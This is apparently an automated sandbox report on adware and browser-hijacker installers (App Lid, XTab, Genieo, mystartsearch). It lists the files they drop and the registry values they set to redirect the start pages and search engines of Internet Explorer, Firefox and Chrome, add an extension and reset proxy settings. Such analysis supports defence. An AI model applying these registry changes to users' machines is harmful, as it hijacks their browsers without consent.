C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\13.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins.json (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\40.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\255.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\221.js (415 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\47.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\195.js (410 bytes)
%Program Files% (x86)\App Lid\Uninstall.exe (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\userCode\background.js (636 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\9.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\220.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\UserInfo.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\39.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\94.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\102.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\72.js (1552 bytes)
%Program Files% (x86)\App Lid\App Lid-bg.exe (4185 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\262.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\42.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-1.dll (33295 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\3.js (63 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\44.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\35.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\1.js (10 bytes)
C:\Windows\Tasks\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-1.job (77 bytes)
%Program Files% (x86)\App Lid\App Lid-buttonutil.exe (1425 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\manifest.xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\installer.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\104.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\246.js (8 bytes)
%Program Files% (x86)\App Lid\App Lid-buttonutil.dll (2321 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\manifest[1].xml (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\md5dll.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\200.js (809 bytes)
%Program Files% (x86)\App Lid\App Lid.ico (9 bytes)
The process F365.tmp:3556 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18} (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 for Windows Server 2003 SP1 (IA64).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 (x86).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Imaging Component (x86).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBDB5.tmp (345 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC1A7..dll (15945 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~BDF4.tmp (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC206.tmp (668 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\MyPDFConverter[1].msi (3239144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC345.tmp (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~C344.tmp (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC186.tmp (672 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 for Windows Server 2003 SP1 (x86).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC216..dll (15945 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~BE15.tmp (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBE27.tmp (705 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC284.tmp (647 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC1A6.tmp (671 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\_ISMSIDEL.INI (31310 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 for Windows XP (x64).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Setup.INI (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\0x0409.ini (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBFBE.tmp (692 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBDF5.tmp (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBFDF.tmp (667 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBE57..dll (15945 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBFEF..dll (15945 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBD94.tmp (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBE16.tmp (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 for Windows Server 2003 SP1 (x64).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC333.tmp (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\MyPDFConverter.msi (88453 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Imaging Component (x64).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC295..dll (15945 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~C332.tmp (10 bytes)
The process firsttime_setup.exe:3488 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvF068.tmp (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\uninstall\firsttime_uninstall.exe (1568 bytes)
The process MSIEXEC.EXE:3852 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI2648.tmp (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI6B2B.tmp (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI605F.tmp (1281 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7B8944BA8AD0EFDF0E01A43EF62BECD0_0B392C5099259E005752375141B9C59A (1504 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7B8944BA8AD0EFDF0E01A43EF62BECD0_0B392C5099259E005752375141B9C59A (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI373A.tmp (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI5FD2.tmp (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6 (1212 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI485.tmp (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI5FB2.tmp (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 (370 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab290.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar291.tmp (2784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI6A40.tmp (3073 bytes)
Registry activity
The process BaofengUpdate.exe:3600 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Mozilla\Extends]
"AppID" = "faststartff@gmail.com"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Search Page" = "http://www.mystartsearch.com/web/?type=ds&ts=1422513759&from=smt&uid=535559167_132775_B48A115F&q={searchTerms}"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.mystartsearch.com/web/?type=ds&ts=1422513759&from=smt&uid=535559167_132775_B48A115F&q={searchTerms}"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Default_Search_URL" = "http://www.mystartsearch.com/web/?type=ds&ts=1422513759&from=smt&uid=535559167_132775_B48A115F&q={searchTerms}"
[HKLM\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command]
"(Default)" = "%Program Files% (x86)\Mozilla Firefox\firefox.exe http://www.mystartsearch.com/?type=sc&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\mystartsearch uninstall]
"DisplayName" = "mystartsearch uninstall"
[HKCU\Software\Classes\Local Settings\MuiCache\2B\52C64B7E\@""%windir%\System32]
"ie4uinit.exe"",-738" = "Start Internet Explorer without ActiveX controls or browser extensions."
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"DisplayName" = "mystartsearch"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.mystartsearch.com/web/?type=ds&ts=1422513759&from=smt&uid=535559167_132775_B48A115F&q={searchTerms}"
[HKCU\Software\Mozilla\Extends]
"UID" = "535559167_132775_B48A115F"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Start Page" = "http://www.mystartsearch.com/?type=hp&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Search_URL" = "http://www.mystartsearch.com/web/?type=ds&ts=1422513759&from=smt&uid=535559167_132775_B48A115F&q={searchTerms}"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Default_Page_URL" = "http://www.mystartsearch.com/?type=hp&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"
[HKLM\SOFTWARE\Clients\StartMenuInternet\VMWAREHOSTOPEN.EXE\shell\open\command]
"(Default)" = "%Program Files%\VMware\VMware Tools\VMwareHostOpen.exe http://www.mystartsearch.com/?type=sc&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\mystartsearch uninstall]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\UninstallManager.exe -ptid=smt"
[HKLM\SOFTWARE\Wow6432Node\mystartsearchSoftware\mystartsearchhp]
"Time" = "Type: REG_QWORD, Length: 8"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command]
"(Default)" = "%Program Files% (x86)\Google\Chrome\Application\chrome.exe http://www.mystartsearch.com/?type=sc&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"
[HKCU\Software\Classes\Local Settings\MuiCache\2B\52C64B7E]
"LanguageList" = "en-US, en"
[HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe http://www.mystartsearch.com/?type=sc&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"
[HKLM\SOFTWARE\Wow6432Node\mystartsearchSoftware\mystartsearchhp]
"oem" = "smt"
[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "1"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.mystartsearch.com/?type=hp&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"
"Search Page" = "http://www.mystartsearch.com/web/?type=ds&ts=1422513759&from=smt&uid=535559167_132775_B48A115F&q={searchTerms}"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.mystartsearch.com/?type=hp&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\mystartsearch uninstall]
"Publisher" = "mystartsearch"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.mystartsearch.com/web/?type=ds&ts=1422513759&from=smt&uid=535559167_132775_B48A115F&q={searchTerms}"
"DisplayName" = "mystartsearch"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.mystartsearch.com/?type=hp&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"
[HKCU\Software\Mozilla\Extends]
"ptid" = "smt"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.mystartsearch.com/?type=hp&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\mystartsearch uninstall]
"DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\UninstallManager.exe氀IJ"
[HKCU\Software\Classes\Local Settings\MuiCache\2B\52C64B7E\@""%systemroot%\system32\windowspowershell\v1.0]
"powershell.exe"",-111" = "Performs object-based (command-line) functions"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"DisplayName" = "mystartsearch"
[HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox\Extensions]
"faststartff@gmail.com" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\faststartff@gmail.com"
The process BaofengUpdate.exe:3212 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Application deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process D79A.tmp:2264 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "86 83 0B D9 8E 3B D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
"WpadDecisionTime" = "11 F7 16 DC 8E 3B D0 01"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process XTab_v4.0.exe:3152 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\HELPDIR]
"(Default)" = "%Program Files% (x86)\XTab"
[HKLM\SOFTWARE\Wow6432Node\supTab]
"ptid" = "smt"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURL" = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IETR02"
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 42 00 00 00 09 00 00 00 00 00 00 00"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0]
"(Default)" = "SupTabLib"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURL" = "http://www.bing.com/favicon.ico"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\0\win32]
"(Default)" = "%Program Files% (x86)\XTab\SupTab.dll"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}]
"(Default)" = "IETabPage Class"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"(Default)" = "%Program Files% (x86)\XTab\SupTab.dll"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"
[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\Version]
"(Default)" = "1.0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"
"DisplayName" = "Bing"
[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconURL" = "http://www.google.com/favicon.ico"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}"
[HKLM\SOFTWARE\Wow6432Node\SupDp]
"dir" = "%Program Files% (x86)\XTab"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconURL" = "http://do-search.com//favicon.ico"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"
[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"
[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}.ico"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"TopResultURL" = "http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"TopResultURL" = "http://www.mystartsearch.com/web/?type=ds&ts=1422513759&from=smt&uid=535559167_132775_B48A115F&q={searchTerms}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURLFallback" = "http://www.bing.com/favicon.ico"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"DisplayName" = "Google"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"DisplayName" = "e"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
